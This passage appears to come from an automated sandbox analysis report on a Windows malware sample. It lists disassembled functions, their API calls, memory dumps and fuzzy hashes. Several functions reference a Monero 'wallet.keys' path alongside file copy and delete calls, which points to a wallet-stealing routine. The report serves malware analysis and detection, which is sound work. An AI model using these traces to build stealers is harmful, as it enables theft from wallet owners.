                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 47cad2d29734a290a115ac19e9ccd74ea5ef15511758018b0196c415d4ca5ff7
                                  • Instruction ID: ab12549527fec2028a2e596509851a58aa22d5ce9d3a0f2be74123d6878651c4
                                  • Opcode Fuzzy Hash: 47cad2d29734a290a115ac19e9ccd74ea5ef15511758018b0196c415d4ca5ff7
                                  • Instruction Fuzzy Hash: 661191B2A44205EBD714DFD4E849FBBBFB8EB04B11F10812AF616A7284D7785840DBA1
                                  Function 00F79260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • StrStrA.SHLWAPI(016FDCE8,?,?,?,00F7140C,?,016FDCE8,00000000), ref: 00F7926C
                                  • lstrcpyn.KERNEL32(011AAB88,016FDCE8,016FDCE8,?,00F7140C,?,016FDCE8), ref: 00F79290
                                  • lstrlen.KERNEL32(?,?,00F7140C,?,016FDCE8), ref: 00F792A7
                                  • wsprintfA.USER32 ref: 00F792C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 7cfafafe67e4d8725f1e1666210eef9680a7a10620c42a04112f48587ba1d9a1
                                  • Instruction ID: 7b284c658eb4401f5d2b72cfd3896d5f33175bdd904a73d30e1bb99a14077a17
                                  • Opcode Fuzzy Hash: 7cfafafe67e4d8725f1e1666210eef9680a7a10620c42a04112f48587ba1d9a1
                                  • Instruction Fuzzy Hash: 7701E575500208FFCB08DFE8E984EAE7FB9EF48350F508548F90A9B205C671AA80DB90
                                  Function 00F612A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F612B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F612BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00F612D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00F612F5
                                  • RegCloseKey.ADVAPI32(?), ref: 00F612FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 71673948818d429be9365231e0dd0882986f514fce60a63dd5fc56cf246f2f87
                                  • Instruction ID: 065d33ff1d17f54791cb825033cac17bed09a0f29a9f3eca1361616a45736d19
                                  • Opcode Fuzzy Hash: 71673948818d429be9365231e0dd0882986f514fce60a63dd5fc56cf246f2f87
                                  • Instruction Fuzzy Hash: 1A0131B9A40208BFDB14DFE0E849FAEBBB8EF48701F408169FA15D7284D6759A41CF50
                                  Function 00F7C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: 7a68b4fcad7c0955143952dbee74fae2b937dbd774e9b21c184eedffbf33d83a
                                  • Instruction ID: b5ba5c36ff77cb520442f873c90edb0ee1f49995c8c97480b859aa947fe8bb9c
                                  • Opcode Fuzzy Hash: 7a68b4fcad7c0955143952dbee74fae2b937dbd774e9b21c184eedffbf33d83a
                                  • Instruction Fuzzy Hash: 3941F6B150075C5EDB318B248C84FFBBFF99F45704F1484EDEA8E86182D2719A44AFA2
                                  Function 00F76630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00F76663
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00F76726
                                  • ExitProcess.KERNEL32 ref: 00F76755
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 09261c60422306ebf58c14db9f73bddb488f0c6c77f00e2e892e47e1e6498136
                                  • Instruction ID: a65bf02495400ff312f7171758f73dd9e8d9ad1929c06f75f008aa2459a87479
                                  • Opcode Fuzzy Hash: 09261c60422306ebf58c14db9f73bddb488f0c6c77f00e2e892e47e1e6498136
                                  • Instruction Fuzzy Hash: DF3121B18012189BDB58EB90DC95FDE7B78AF44300F80819AF31967181DF786B89DF56
                                  Function 00F787C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F80E28,00000000,?), ref: 00F7882F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F78836
                                  • wsprintfA.USER32 ref: 00F78850
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 3f6ffff450bde1aaf64bd6c5a1e05da6e35e638264fc7f2a9a1531d66e28d60e
                                  • Instruction ID: ca2ca47efb084f1c064a4c09edd30b6e6d404a2fd5bd62dfc59bf4bd3f867a48
                                  • Opcode Fuzzy Hash: 3f6ffff450bde1aaf64bd6c5a1e05da6e35e638264fc7f2a9a1531d66e28d60e
                                  • Instruction Fuzzy Hash: AB2130B1A40204AFDB18DFD4ED49FAEBBB8FF48B01F504129F615A7284C7799941CBA1
                                  Function 00F78D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00F7951E,00000000), ref: 00F78D5B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00F78D62
                                  • wsprintfW.USER32 ref: 00F78D78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: 4693fa9439a4b58a89b9ab17d382b080e38346b15ac4ffb19ba4836f7b0bf605
                                  • Instruction ID: 24d5e9e2528919ea05572b0750ca696641b0581bdcaf9d56681286beb8c1adb3
                                  • Opcode Fuzzy Hash: 4693fa9439a4b58a89b9ab17d382b080e38346b15ac4ffb19ba4836f7b0bf605
                                  • Instruction Fuzzy Hash: DBE08CB0A40208BFC724DFE4E80AE697BB8EF04702F4000A4FD0A87280DA719E40DB92
                                  Function 00F6A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F78B60: GetSystemTime.KERNEL32(00F80E1A,016F9D28,00F805AE,?,?,00F613F9,?,0000001A,00F80E1A,00000000,?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F78B86
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F6A2E1
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 00F6A3FF
                                  • lstrlen.KERNEL32(00000000), ref: 00F6A6BC
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                  • DeleteFileA.KERNEL32(00000000), ref: 00F6A743
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 94fdbaa9917c41d0f714b66a8c156021004fc983eb1421583128fda2a50485d3
                                  • Instruction ID: 7640df21be81dc5731e4895d847952ed1eded0fdc1dc32c15c8d5442d2e34024
                                  • Opcode Fuzzy Hash: 94fdbaa9917c41d0f714b66a8c156021004fc983eb1421583128fda2a50485d3
                                  • Instruction Fuzzy Hash: EBE1E5728101089ADB19FBA4DC91DEE733CAF94300F51C16AF52B76091EF386A59DB63
                                  Function 00F6D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F78B60: GetSystemTime.KERNEL32(00F80E1A,016F9D28,00F805AE,?,?,00F613F9,?,0000001A,00F80E1A,00000000,?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F78B86
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F6D481
                                  • lstrlen.KERNEL32(00000000), ref: 00F6D698
                                  • lstrlen.KERNEL32(00000000), ref: 00F6D6AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 00F6D72B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 96334327434d7a580c460bb367ab276e2ab0684fcfae3f6376d55bb5851963f9
                                  • Instruction ID: 3be0593ea087f067500f199d369c09174aa79eb9b928a4a1d8edc9dc831b64d1
                                  • Opcode Fuzzy Hash: 96334327434d7a580c460bb367ab276e2ab0684fcfae3f6376d55bb5851963f9
                                  • Instruction Fuzzy Hash: D29136719101089BDB18FBA4DC56DEE7338AF94300F51C16AF51BA3091EF386A59EB63
                                  Function 00F6D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F78B60: GetSystemTime.KERNEL32(00F80E1A,016F9D28,00F805AE,?,?,00F613F9,?,0000001A,00F80E1A,00000000,?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F78B86
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F6D801
                                  • lstrlen.KERNEL32(00000000), ref: 00F6D99F
                                  • lstrlen.KERNEL32(00000000), ref: 00F6D9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 00F6DA32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
